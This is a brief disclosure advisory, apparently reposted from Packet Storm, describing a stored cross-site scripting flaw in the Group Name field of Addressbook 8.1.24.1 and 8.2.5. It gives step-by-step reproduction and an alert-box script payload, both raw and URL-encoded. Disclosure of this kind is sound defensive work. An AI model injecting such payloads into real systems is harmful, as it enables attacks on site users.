Addressbook versions 8.1.24.1 and 8.2.5 suffer from a cross site scripting vulnerability in Group Name.
20aebf2bfe9b011017e46733e1177c025ebc2f405f02f295a97fb67315a1919dInstructions.
After authentication, click on the Group tab at the top. Click on the
New Group Button on the group page.
For the group name (the first field) enter the following XSS test
string:
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Then call the XSS string from the URL -- technically one calls the group
name -- through the group parameter as such:
http://[server]/index.php?group=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
I emailed the apparent author but did not receive a reply.
Ken
http://silverbackventuresllc.com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed